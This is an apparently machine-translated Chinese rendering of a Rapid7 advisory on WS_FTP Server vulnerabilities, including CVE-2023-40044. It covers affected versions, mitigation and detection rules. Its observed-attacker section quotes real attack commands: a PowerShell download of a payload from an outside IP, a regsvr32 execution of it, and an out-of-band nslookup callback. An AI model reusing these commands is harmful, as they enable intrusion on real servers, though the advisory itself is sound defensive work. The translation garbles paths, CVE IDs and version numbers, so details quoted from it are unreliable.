最后更新于2024年2月27日星期二17:16:38 GMT

9月27日, 2023, Progress Software发布了一份关于多个漏洞影响的安全咨询 WS_FTP服务器,一个安全的文件传输解决方案. 该通知中存在许多漏洞, 其中两个是关键漏洞(cve - 2023 - 40044和CVE-2023-42657). 我们的研究小组已经确定了似乎是 .. NET反序列化漏洞(cve - 2023 - 40044),并确认可以通过单个HTTPS POST请求和预先存在的漏洞利用该漏洞 ysoserial.网 小工具.

注意: 截至9月30日,Rapid7已经观察到多个利用WS_FTP的实例. 中详细介绍了该活动 观察到的攻击者行为 本博客的一部分.

报告中的漏洞涵盖了一系列受影响的版本, 其中一些只影响启用了Ad Hoc传输模块的WS_FTP服务器. 然而,Progress Software的建议敦促所有客户更新到WS_FTP服务器.8.2,即软件的最新版本. Rapid7响应了这一建议. 供应商咨询有关于升级的指导, 以及禁用或删除Ad Hoc传输模块的信息.

关键漏洞如下-特别是NVD分数 cve - 2023 - 40044 仅作为“高”的严重程度,而不是危急的:

  • cve - 2023 - 40044: 在WS_FTP服务器版本8之前.7.4和8.8.2、Ad Hoc Transfer模块存在安全漏洞 .NET反序列化漏洞,允许未经身份验证的攻击者在底层WS_FTP服务器操作系统上执行远程命令. 该漏洞影响WS_FTP服务器Ad Hoc模块的所有版本. Progress Software的建议指出,没有安装Ad Hoc传输模块的WS_FTP服务器不容易受到cve - 2023 - 40044的攻击.
  • cve - 2023 - 42657: WS_FTP服务器版本在8之前.7.4和8.8.2 .易受目录遍历漏洞的攻击,该漏洞允许攻击者执行文件操作(删除, 重命名, 删除文件夹, 在其授权的WS_FTP文件夹路径之外的文件和文件夹上. 攻击者还可以转义WS_FTP服务器文件结构的上下文,并执行相同级别的操作(删除, 重命名, 删除文件夹, Mkdir)在底层操作系统上的文件和文件夹位置.

下面列出了其他(非关键)漏洞. 看到 Progress Software的建议 详情请参阅:

  • cve - 2023 - 40045: 在WS_FTP服务器版本8之前.7.4和8.8.2、Ad Hoc Transfer模块容易受到跨站点脚本(XSS)的攻击. 特定有效负载的交付可能允许攻击者在受害者浏览器的上下文中执行恶意JavaScript.
  • cve - 2023 - 40046: 在版本8之前的WS_FTP服务器管理器界面.7.4和8.8.2易受SQL注入攻击, 这可能允许攻击者推断有关数据库的结构和内容的信息,并执行更改或删除数据库元素的SQL语句.
  • cve - 2023 - 40047: 在版本8之前的WS_FTP服务器管理模块.8.2容易受到存储跨站点脚本(XSS)的攻击, 这可能允许具有管理权限的攻击者导入包含跨站点脚本有效负载的恶意属性的SSL证书.  成功存储跨站点脚本负载之后, 攻击者可以利用此漏洞使用专门的有效负载来攻击WS_FTP服务器管理员,从而在受害者的浏览器上下文中执行恶意JavaScript.  
  • cve - 2023 - 40048: WS_FTP服务器之前版本中的经理界面.8.在与WS_FTP服务器管理功能相对应的POST事务上缺少跨站点请求伪造(CSRF)保护.
  • cve - 2023 - 40049: 在WS_FTP服务器版本8之前.8.2,未经身份验证的用户可以枚举'WebServiceHost'目录列表下的文件.  
  • cve - 2022 - 27665: WS_FTP服务器.6.0容易受到XSS的反射(通过AngularJS沙盒转义表达式), 它允许攻击者通过在子目录搜索栏或添加文件夹文件名框中输入恶意有效载荷来执行客户端命令. 例如, 有客户端模板注入通过subFolderPath到ThinClient/WtmApiService.asmx / GetFileSubTree URI.

观察到的攻击者行为

在9月30日晚上, 2023, Rapid7在多个客户环境中观察到一个或多个最近披露的WS_FTP漏洞被利用的情况. 我们的团队响应的单个警报在2023-10-01 01:38:43 UTC和01:41:38 UTC之间的几分钟内发生.

流程执行链在所有观察到的实例中看起来是相同的,这表明 可能的 大规模利用脆弱的WS_FTP服务器. 另外, 我们的耐多药团队观察到在所有事件中使用了相同的Burpsuite域, 这可能表明我们所看到的活动背后有一个单一的威胁行为者.

曾祖过程:
C:\Windows\SysWOW64\i网srv\w3wp.. exe -ap "WSFTPSVR_WTM" -v.0" -l "webengine.-a \\.\pipe\iisipm18823d36-4194- 405b -cea0f4389a0c -h "C:\i网pub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.配置“-w”“-m 1 -t 20 -ta 0”

祖父母的过程:
C:\Windows\Microsoft.净\ \ v4框架.0.30319年\ csc.C:\Windows\Microsoft . exe" /noconfig /fullpaths @.净\ \ v4框架.0.30319 \临时ASP.网络文件\出去\ e514712b \ a2ab2de1 \ ryvjavth.cmdline

父进程:
C:\Windows\Microsoft.净\ \ v4框架.0.30319年\ cvtres.. exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES6C8F . exe.tmp”“c: \ Windows \微软.净\ \ v4框架.0.30319 \临时ASP.网络文件\出去\ e514712b \ a2ab2de1 \ CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP

子进程:
C:\Windows\System32\cmd./c CMD.. exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com

Rapid7托管服务还观察到以下攻击链:

曾祖过程:
C:\WINDOWS\SysWOW64\i网srv\w3wp.. exe -ap "WSFTPSVR_WTM" -v.0" -l "webengine.-a \\.\pipe\iisipme6a8a618-bb7f-470c- 929e9 -58204f6ffcfa -h "C:\i网pub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.配置“-w”“-m 1 -t 20 -ta 0”

祖父母的过程:
C:\Windows\System32\cmd.“/c powershell /c”IWR http://172.245.213[.[135:3389/bcrypt -OutFile c:\用户\public\NTUSER ..dll

父进程:
powershell /c "IWR http://172.245.213[.[135:3389/bcrypt -OutFile c:\用户\public\NTUSER ..dll

子进程:
C:\Windows\System32\cmd./c regsvr32 c:\用户\public\NTUSER . exe.dll

在执行时, NTUSER.dll 联系了Cloudflare的工作人员 状态.backendapi-fe4 [.)员工(.)开发 它会掉落一个额外的文件, stage2.邮政编码,进入记忆. Stage2.邮政编码文件中包含另一个可执行文件,它似乎正在使用Golang并与域通信 realtime-v1 [.] backendapi-fe4 [.)员工(.)开发. 分析 NTUSER.dll 确定它与silver开发后框架相关联.

缓解指导

软件安全咨询受到了越来越多的审查,并引起了媒体的广泛关注, 用户, 以及自2023年5月Cl0p勒索软件组织以来的安全社区 攻击MOVEit Transfer. 安全文件传输技术更普遍地继续成为研究人员和攻击者的热门目标.

自9月30日以来,WS_FTP服务器一直处于活跃状态, 我们建议在紧急情况下更新到固定版本, 无需等待典型的补丁周期发生. 如咨询所述, 使用完整的安装程序升级到补丁版本是修复此问题的唯一方法. 当升级运行时,系统将会中断."

最理想的做法是升级到8.8.如卖方所建议. 如果您正在使用WS_FTP服务器中的Ad Hoc传输模块,并且无法更新到固定版本, 请考虑禁用或移除该模块.

看到 Progress Software的建议 查阅最新资料.

Rapid7客户

运行WS_FTP的InsightVM和expose客户可以在今天(9月29日)发布的内容中使用经过验证的漏洞检查来评估本博客中所有8个cve的暴露情况.

通过Rapid7扩展的检测规则库,insighttidr和管理检测和响应客户已经拥有了现有的检测覆盖范围. 部署了以下检测规则,并对与WS_FTP服务器利用相关的活动进行警报:

  • 可疑进程- WS_FTP服务器进程生成CMD子进程
  • Webshell - IIS生成CMD生成PowerShell
  • Webshell - IIS生成PowerShell
  • Webshell -由Webserver启动的命令
  • 可疑进程-命令行中与Burpsuite相关的域

伶盗龙 有一个神器 以检测与IIS日志中潜在的WS_FTP利用相关的字符串.

更新

9月30日: 更新说明:Rapid7正在观察野外WS_FTP利用的多个实例,而伶盗龙有一个可用的工件来协助威胁狩猎. 截至周五晚上,cve - 2023 - 40044的概念验证漏洞代码也已公开, 9月29日. 发现cve - 2023 - 40044的Assetnote有一篇完整的文章 在这里 截至9月30日.

10月1日: 更新了Rapid7管理服务观察到的第二个攻击链的详细信息.

10月2日: 更新为Rapid7 耐多药和insighttidr客户指定WS_FTP服务器利用的检测规则.